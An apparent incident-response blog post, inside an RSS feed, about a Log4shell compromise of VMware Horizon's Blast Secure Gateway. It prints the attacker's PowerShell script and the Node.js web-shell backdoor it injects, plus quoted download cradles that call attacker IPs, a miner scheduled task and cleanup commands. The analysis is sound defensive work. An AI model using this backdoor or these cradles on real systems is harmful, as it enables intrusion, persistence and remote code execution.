<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Cybermeng]]></title><description><![CDATA[Thoughts, stories and ideas about Infosec]]></description><link>http://www.cybermeng.info/</link><image><url>http://www.cybermeng.info/favicon.png</url><title>Cybermeng</title><link>http://www.cybermeng.info/</link></image><generator>Ghost 4.1</generator><lastBuildDate>Mon, 29 Sep 2025 17:23:03 GMT</lastBuildDate><atom:link href="http://www.cybermeng.info/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Log4shell on VMWare Horizon]]></title><description><![CDATA[Recently I performed a DFIR mission after successful exploitation of CVE-2021-44228 and since an advisory has already been published by the NHS in United Kingdom, I can talk about my experience on it.]]></description><link>http://www.cybermeng.info/log4shell-on-vmware-horizon/</link><guid isPermaLink="false">61dc5f06bb060c0001627898</guid><dc:creator><![CDATA[Alessio Mangoni]]></dc:creator><pubDate>Tue, 11 Jan 2022 17:26:26 GMT</pubDate><media:content url="http://www.cybermeng.info/content/images/2022/01/horizon-7-configuration-01.jpg" medium="image"/><content:encoded><![CDATA[<h3 id="ive-investigated-on-a-backdoor-being-installed-by-an-unknown-actor-on-the-blast-secure-gateway">I&apos;ve investigated on a backdoor being installed by an unknown actor on the Blast Secure Gateway.</h3><img src="http://www.cybermeng.info/content/images/2022/01/horizon-7-configuration-01.jpg" alt="Log4shell on VMWare Horizon"><p><br><em>Click on &quot;Details&quot; below for the last updates.</em></p><!--kg-card-begin: html--><details>
    <update>2022-01-26T18:30:00+00:00 Blackberry published a more detailed research</update>
    <p>See the link in the &quot;further reading&quot; section.
        The Blackberry Research &amp; Intelligence and Incident Response teams witness some post-exploitation activity that I added here as well.
    </p>
</details><!--kg-card-end: html--><p>One of those days at the SOC, 2021 is almost over and the shift is flooded by alerts on the recently discovered CVE-2021-44228. </p><p>The security shift under the Christmas holidays to me should be a moment to close incidents, send some wishes to the customers and focus on the (few) alerts triggered.</p><p> <br>Not this year... </p><p>Thanks to the &quot;<a href="https://github.com/NCSC-NL/log4shell">Log4shell CVEs family</a>&quot;. &#xA0; &#xA0;</p><p></p><h3 id="so-it-begins">&quot;So it begins&quot;</h3><p>Everything began with the IDS triggering the following rule by <a href="https://www.fox-it.com">FOX IT</a> :</p><!--kg-card-begin: markdown--><p><code>FOX-SRT &#x2013; Exploit &#x2013; Possible Rogue JNDI LDAP Bind to External Observed (CVE-2021-44228)</code></p>
<!--kg-card-end: markdown--><p>From their <a href="https://gist.github.com/fox-srt/c8d2fa991e8bb2be1446bad18f010fcb#file-log4shell-success-rules">Gist</a> :</p><!--kg-card-begin: html--><pre id="show-json-from-git"></pre>
<script>
var url = 'https://gist.githubusercontent.com/fox-srt/c8d2fa991e8bb2be1446bad18f010fcb/raw/c7e0ce8901a728121d42235c4d545e3ae402248f/log4shell-success.rules';
fetch(url)
.then(res => res.text())
.then((out) => {
  var message = document.getElementById("show-json-from-git");
  message.innerText = out;
  message.style.backgroundColor = "GREY";
})
.catch(err => { throw err });
</script><!--kg-card-end: html--><p>Basically an internal server contacted &quot;something&quot; behind a public IP using the LDAP protocol on port 80; OK, pretty suspicious but we need evidence that our &quot;something&quot; replied with a malicious payload.</p><p>This was unfortunately indeed the case.</p><p>On the same split second another rule from the <a href="https://www.proofpoint.com/us/threat-insight/et-pro-ruleset">Emerging Threats ET Pro ruleset</a> triggered:</p><!--kg-card-begin: markdown--><p><code>ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2</code></p>
<!--kg-card-end: markdown--><p>This time, with our internal server as a destination.</p><p>The situation gets scary pretty quickly and we retrieve part of the payload from our IDS; we decode it and after some magic receipts on our internal <a href="https://gchq.github.io/CyberChef/">Cyberchef</a> we are able to decode the inner payload hidden in the malicious Java class downloaded by the internal server as part of the successful exploitation.</p><h3 id="the-bad-the-ugly-and-the-payload">The bad, the ugly and the payload</h3><p>Turns out, it&apos;s a Powershell script:</p><!--kg-card-begin: markdown--><p><code>powershell -c $path=gwmi win32_service|?{$_.Name -like &quot;*VMBlastSG*&quot;}|%{$_.PathName -replace &apos;&quot;&apos;, &apos;&apos; -replace &quot;nssm.exe&quot;,&quot;lib\absg-worker.js&quot;};$expr=&quot;req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes(&apos;&lt;REDACTED&gt;&apos;)) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require(&apos;child_process&apos;).execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers[&apos;data&apos;], &apos;base64&apos;).toString(&apos;ascii&apos;)`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;&quot;;(Get-Content $path)|ForEach-Object {$_ -replace &quot;req.connection.end\(\)\;&quot;, $expr}|Set-Content $path;Restart-Service -Force VMBlastSG</code></p>
<!--kg-card-end: markdown--><p>We go full Incident Response practically immediately and the customer is alerted, the machine is put offline and a full forensics dump is discussed at the phone while the containment plan unravels.</p><p>While we wait for the forensic image, we decide to go deeper in order to understand what the Powershell is supposed to do, so we will know what to look for if it ran on the machine.</p><p>We found two public JoeSandbox analysis:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.joesandbox.com/analysis/546047/0/html"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Automated Malware Analysis Report for - Generated by Joe Sandbox</div><div class="kg-bookmark-description">Deep Malware Analysis - Joe Sandbox Analysis Report</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAABIFBMVEX///8IRGYIRGYIRGYIRGYIRGYIRGYIRGYbXowbXowbXowIRGa+Ehv/AAD/AAD/AAA/T3YbXowbXowIRGYEJjj/AAAFLEIAAAD/AAD/AAD/AAD/AAAjW4cbXowIRGYAAAAAAAAsaakGDBRCiuIbXowuYJ1CiuJCiuIKQF5CiuJCiuIKQF5ITHEbXoxCiuIKQF4bXow5d8I4dcAYUn8KQF4KQF4KQF4KQF5eQmM+gdNAh90WPVobXoxCiuIoaaZAPlszVH0bXoxCiuIgY5YbXowIRGYbXoz/AACbKT3UEhovcaKKksODwf8oapqphbBJib8ZM1TJVXBPkMYUK0boJDAIERsKQF51JDUpVo2eHCplKDtCiuIqaqkVTneEIC9wO1ibsRUmAAAARXRSTlMBIZHhYfHBoRGhIYE9scGRmfExMVcxfdFBEWHx+cHRwUF95SGB0VFhEbGhIe+xMcFx5deDoXGB4fvx+/2R4YOL+9ERiUGMSrkyAAAAz0lEQVQY02NgYGBgZGJ2dWVAABZWV1c2dgYGDk4uCN/VlZuHl4+PX8BNUAjIF3ZlFWEQdQcCDzewCJurmDgDgwSDpJS0p4yXLAMDq5y8AsQsUWlvH1+gEkUlZajpUn4+/ioMDKoBalAByUCfIKAe1WB1qIBGCFhAM1QLwtcOC9dx02VgUA+I0APL64dFurkZAFmGoUbGJqZm5mFRFm5uIMfqWUZbxcSGWcfFu7nZgDXr2UZH29l7OLi5OUKNd1LXdHYDAl0OhJdV3AR1XUAMAD+3H3kh05hWAAAAAElFTkSuQmCC" alt="Log4shell on VMWare Horizon"><span class="kg-bookmark-author">Joe Security LLC</span><span class="kg-bookmark-publisher">Joe Security LLC</span></div></div><div class="kg-bookmark-thumbnail"><img src="data:image/gif;base64,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" alt="Log4shell on VMWare Horizon"></div></a></figure><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.joesandbox.com/analysis/544644/0/html"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Automated Malware Analysis Report for - Generated by Joe Sandbox</div><div class="kg-bookmark-description">Deep Malware Analysis - Joe Sandbox Analysis Report</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAABIFBMVEX///8IRGYIRGYIRGYIRGYIRGYIRGYIRGYbXowbXowbXowIRGa+Ehv/AAD/AAD/AAA/T3YbXowbXowIRGYEJjj/AAAFLEIAAAD/AAD/AAD/AAD/AAAjW4cbXowIRGYAAAAAAAAsaakGDBRCiuIbXowuYJ1CiuJCiuIKQF5CiuJCiuIKQF5ITHEbXoxCiuIKQF4bXow5d8I4dcAYUn8KQF4KQF4KQF4KQF5eQmM+gdNAh90WPVobXoxCiuIoaaZAPlszVH0bXoxCiuIgY5YbXowIRGYbXoz/AACbKT3UEhovcaKKksODwf8oapqphbBJib8ZM1TJVXBPkMYUK0boJDAIERsKQF51JDUpVo2eHCplKDtCiuIqaqkVTneEIC9wO1ibsRUmAAAARXRSTlMBIZHhYfHBoRGhIYE9scGRmfExMVcxfdFBEWHx+cHRwUF95SGB0VFhEbGhIe+xMcFx5deDoXGB4fvx+/2R4YOL+9ERiUGMSrkyAAAAz0lEQVQY02NgYGBgZGJ2dWVAABZWV1c2dgYGDk4uCN/VlZuHl4+PX8BNUAjIF3ZlFWEQdQcCDzewCJurmDgDgwSDpJS0p4yXLAMDq5y8AsQsUWlvH1+gEkUlZajpUn4+/ioMDKoBalAByUCfIKAe1WB1qIBGCFhAM1QLwtcOC9dx02VgUA+I0APL64dFurkZAFmGoUbGJqZm5mFRFm5uIMfqWUZbxcSGWcfFu7nZgDXr2UZH29l7OLi5OUKNd1LXdHYDAl0OhJdV3AR1XUAMAD+3H3kh05hWAAAAAElFTkSuQmCC" alt="Log4shell on VMWare Horizon"><span class="kg-bookmark-author">Joe Security LLC</span><span class="kg-bookmark-publisher">Joe Security LLC</span></div></div><div class="kg-bookmark-thumbnail"><img src="data:image/gif;base64,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" alt="Log4shell on VMWare Horizon"></div></a></figure><p>Performed pretty recently, but they bear no information since the first part of the script looks for a service named something like &quot;VMBlastSG&quot; which is not present on the sandbox.</p><p>From the machine logs, we see that the service VMBlastSG indeed restarted around the time of the malicious Java class download, so it must mean that the machine was running that service and that the Powershell script was executed.</p><!--kg-card-begin: markdown--><p><code>Restart-Service -Force VMBlastSG</code></p>
<!--kg-card-end: markdown--><p>After some string formatting, it becomes also clear that the script looks for the path of the service VMBlastSG , it replaces nssm.exe (which is the service manager used by the VMWare Horizon component) with the file absg-worker.js under the folder &quot;lib&quot; in the path and it stores the path in a variable.</p><!--kg-card-begin: markdown--><p><code>$path=gwmi win32_service|?{$_.Name -like &quot;*VMBlastSG*&quot;}|%{$_.PathName -replace &apos;&quot;&apos;, &apos;&apos; -replace &quot;nssm.exe&quot;,&quot;lib\absg-worker.js&quot;};</code></p>
<!--kg-card-end: markdown--><p>So, we know that it looks for that &quot;absg-worker.js&quot; file, and since it restarts the service it might be to achieve persistence. This is clearly done on the second &quot;replace&quot; step:</p><!--kg-card-begin: markdown--><p><code>(Get-Content $path)|ForEach-Object {$_ -replace &quot;req.connection.end\(\)\;&quot;, $expr}|Set-Content $path</code></p>
<!--kg-card-end: markdown--><p>Where, it replaces all occurences of the function &quot;req.connection.end()&quot; present in the library &quot;absg-worker.js&quot; with what is contained in the &quot;$expr&quot; variable.</p><h3 id="a-backdoor-to-heaven">A (back)door to heaven</h3><p>Now, since we know that the attacker was able to achieve persistence by writing something used by the VMBlastSG service, we need to understand what.</p><p>After some formatting and &quot;beautyfying&quot; it becomes clear that &quot;$expr&quot; is a Javascript snippet:</p><!--kg-card-begin: markdown--><pre><code>req.connection.end();
            }

if (String(req.url).includes(&apos;&lt;REDACTED&gt;&apos;)) {
    try {
        replyError(req, res, 200, require(&apos;child_process&apos;).execSync(
            Buffer.from(req.headers[&apos;data&apos;],
                &apos;base64&apos;).toString(&apos;ascii&apos;)
        ).toString());
    } catch (err) {
        replyError(req, res, 400, err.stderr.toString());
    }
    return;
}

</code></pre>
<!--kg-card-end: markdown--><p>This is what is rewritten on every occurence of the &quot;req.connection.end()&quot; function present in the file &quot;absg-worker.js&quot; located under the folder &quot;lib&quot; relative to the location of nssm.exe when under the path of the service VMBlastSG.</p><p>The backdoor itself is pretty simple, it provides a specific URL (the &quot;&lt;REDACTED&gt;&quot; string) where the HTTP header &quot;data&quot; is decoded from base64 and executed on the system.</p><h3 id="amazing-now-what">Amazing.. now what?</h3><p>Well, that&apos;s it basically for now. At the time of writing, no further evidence has been found on the forensic image of the machine. Maybe the response was so quick that the backdoor was never used.</p><p>My personal guess is that the malicious actor(s) didn&apos;t want to expose their full toolkit from the start, the backdoor installation might be part of a multi-steps exploitation where the second step will occur in some days/weeks (or is happening right now?) and will be to call the still-active backdoors to move deeper in the victims network.</p><p>One thing that needs to be mentioned is that the service VMBlastSG is part of the &quot;Blast Secure Gateway&quot; which is included in the &quot;Unified Access Gateway&quot; and <strong>it needs to be enabled to be exploited.</strong></p><p>After analysing the forensic image I also had no evidences from all the VMWare Horizon stored on the machine:</p><!--kg-card-begin: markdown--><pre><code>- vminst [root]\ProgramData\VMware\logs\vminst.log{date}.log

- vmmsi [root]\ProgramData\VMware\logs\vmmsi.log{date}.log

- VMwareHorizonClient
[root]\ProgramData\VMware\logs\VMwareHorizonClient{date}.log

- VMwareHorizonClientViewClientsx64
[root]\ProgramData\VMware\logs\VMwareHorizonClient{date}ViewClientsx64.log

- events-Cluster
[root]\ProgramData\VMware\VDM\events\events-Cluster-{HOSTNAME}-{date}.log

- edbtransactions?
[root]\ProgramData\VMware\VDM\ldap\data\edb{sequence}.log (which are
binary files)

- edb [root]\ProgramData\VMware\VDM\ldap\data\edb.log (which is a binary
file)

- SecurityGateway.log [root]\ProgramData\VMware\VDM\logs\PCoIP Secure
Gateway\SecurityGateway{date}.log

- catalina [root]\Program Files\VMWare\VMWare
View\Server\broker\logs\catalina{date}.log

- error [root]\Program Files\VMWare\VMWare
View\Server\messagebus\log\error.log-{date}.old 
</code></pre>
<!--kg-card-end: markdown--><p>But maybe, you will have more luck than me; in the meantime, according to <a href="https://techzone.vmware.com/resource/blast-extreme-display-protocol-vmware-horizon-7">VMWare Horizon documentation</a>:</p><!--kg-card-begin: markdown--><p><img src="http://www.cybermeng.info/content/images/2022/01/Blast-Extreme-Display-Protocol-April2021-final.005-2.png" alt="Log4shell on VMWare Horizon" loading="lazy"></p>
<!--kg-card-end: markdown--><p>We should have evidences of the backdoor being used in the logs of the &quot;Web Reverse Proxy&quot; component in the &quot;Unified Access Gateway&quot;, which I&apos;ve already required.</p><h3 id="post-exploitation-evidences-from-the-blackberry-blog"><br>Post-exploitation evidences (from the <a href="https://blogs.blackberry.com/en/2022/01/log4u-shell4me">Blackberry blog</a>)</h3><!--kg-card-begin: markdown--><h4 id="encoding-examples">Encoding Examples</h4>
<pre><code>cmd /C &quot;powershell -NonI -W Hidden -NoP -Exec Bypass -Enc &lt;Base64 Encoded Command&gt;

powershell.exe -Enc &lt;Base64 Encoded Command&gt;
</code></pre>
<h4 id="typical-download-cradle">Typical Download Cradle</h4>
<pre><code>IEX (New-Object Net.WebClient).DownloadString(&#x2018;&lt;URL&gt;&#x2019;)
</code></pre>
<h4 id="curl-download-attempt">Curl Download Attempt</h4>
<pre><code>cmd /C &quot;curl &lt;URL&gt; | bash&quot;
</code></pre>
<h4 id="cryptocurrency-miner-download-example">Cryptocurrency Miner Download Example</h4>
<pre><code>powershell iex(New-Object Net.WebClient).DownloadString(&apos;hxxp://80.71.158[.]96/xms.ps1&apos;)
</code></pre>
<h4 id="scheduled-task-creation">Scheduled Task Creation</h4>
<pre><code>&quot;C:\Windows\system32\schtasks.exe&quot; /create /F /sc minute /mo 1 /tn BrowserUpdate /tr
&quot;C:\Windows\system32\config\systemprofile\AppData\Roaming\network02.exe --donate-level 1 -o b.oracleservice[.]top -o 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B&quot;
</code></pre>
<h4 id="cleanup-examples">Cleanup Examples</h4>
<pre><code>&#x201C;C:\Windows\system32\cmd.exe&quot; /c del /f /q C:\ProgramData\Oracle\Java\java.exe&#x201D;

&#x201C;C:\Windows\System32\Wbem\WMIC.exe&quot; process where &quot;ExecutablePath like &apos;c:\\windows\\temp\\%&apos;&quot; delete

&quot;C:\Windows\System32\Wbem\WMIC.exe&quot; process where &quot;ExecutablePath like &apos;C:\\Users\\\\AppData\\Local\\Temp\\%&apos;&quot; delete

&quot;C:\Windows\system32\cmd.exe&quot; /c del /f /q C:\ProgramData\nTNLLnvWzl\pythonhs.exe

&quot;C:\Windows\system32\cmd.exe&quot; /c del /f /q %tmp%\sysupdate.exe

&quot;C:\Windows\System32\Wbem\WMIC.exe&quot; process where &quot;ExecutablePath like &apos;C:\\Users\\Administrator\\AppData\\Local\\Temp\\%&apos;&quot; delete

&quot;C:\Windows\system32\schtasks.exe&quot; /delete /tn * /F
</code></pre>
<h4 id="cobalt-strike-download-cradle">Cobalt Strike Download Cradle</h4>
<pre><code>IEX ((New-Object System.Net.WebClient).DownloadString(&apos;hxxp://185.112.83[.]116:8080/drv&apos;))
</code></pre>
<h4 id="cobalt-strike-beacon-user-agent-string">Cobalt Strike Beacon User-Agent String</h4>
<pre><code>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
</code></pre>
<!--kg-card-end: markdown--><h2 id="attribution-bandwagon">Attribution-bandwagon</h2><p>A report from <a href="https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/">Crowdstrike</a> gives attribution to a similar observed activity to the APT &quot;Acquatic Panda&quot; but VMWare and Log4shell are too juicy as target that I would think every APT group might be interested.<br>Blackberry attributes the attacks to the Initial Access Broker &quot;Prophet Spider&quot;. <br></p><h2 id="tlp-mitre-attck-iocs">TLP / MITRE ATT&amp;CK / IOCs </h2><p>TLP: White, aside from the &lt;REDACTED&gt; string that should be TLP:GREEN</p><!--kg-card-begin: markdown--><h4 id="mitre-attck-techniques">MITRE ATT&amp;CK techniques:</h4>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1132/001/">https://attack.mitre.org/techniques/T1132/001/</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">https://attack.mitre.org/techniques/T1059/001/</a></li>
<li><a href="https://attack.mitre.org/techniques/T1574/001/">https://attack.mitre.org/techniques/T1574/001/</a></li>
<li><a href="https://attack.mitre.org/techniques/T1003/001/">https://attack.mitre.org/techniques/T1003/001/</a></li>
</ul>
<!--kg-card-end: markdown--><p></p><h2 id="further-readings-and-references">Further readings and references</h2><!--kg-card-begin: markdown--><h4 id="further-reading">Further reading</h4>
<ul>
<li><a href="https://blogs.blackberry.com/en/2022/01/log4u-shell4me">https://blogs.blackberry.com/en/2022/01/log4u-shell4me</a></li>
<li><a href="https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/">https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/</a></li>
<li><a href="https://docs.vmware.com/en/VMware-Horizon-7/7.13/horizon-architecture-planning/GUID-90C47ABC-6BC7-4A4C-A24C-B4FA19454B33.html">https://docs.vmware.com/en/VMware-Horizon-7/7.13/horizon-architecture-planning/GUID-90C47ABC-6BC7-4A4C-A24C-B4FA19454B33.html</a></li>
<li><a href="https://techzone.vmware.com/resource/blast-extreme-display-protocol-vmware-horizon-7#introduction-to-vmware-blast-extreme">https://techzone.vmware.com/resource/blast-extreme-display-protocol-vmware-horizon-7#introduction-to-vmware-blast-extreme</a></li>
</ul>
<h4 id="references">References</h4>
<ul>
<li><a href="https://digital.nhs.uk/cyber-alerts/2022/cc-4002">https://digital.nhs.uk/cyber-alerts/2022/cc-4002</a></li>
<li><a href="https://github.com/NCSC-NL/log4shell">https://github.com/NCSC-NL/log4shell</a></li>
<li><a href="https://www.joesandbox.com/analysis/546047/0/html">https://www.joesandbox.com/analysis/546047/0/html</a></li>
<li><a href="https://www.joesandbox.com/index.php/analysis/912166">https://www.joesandbox.com/index.php/analysis/912166</a></li>
<li><a href="https://gist.github.com/fox-srt/c8d2fa991e8bb2be1446bad18f010fcb">https://gist.github.com/fox-srt/c8d2fa991e8bb2be1446bad18f010fcb</a></li>
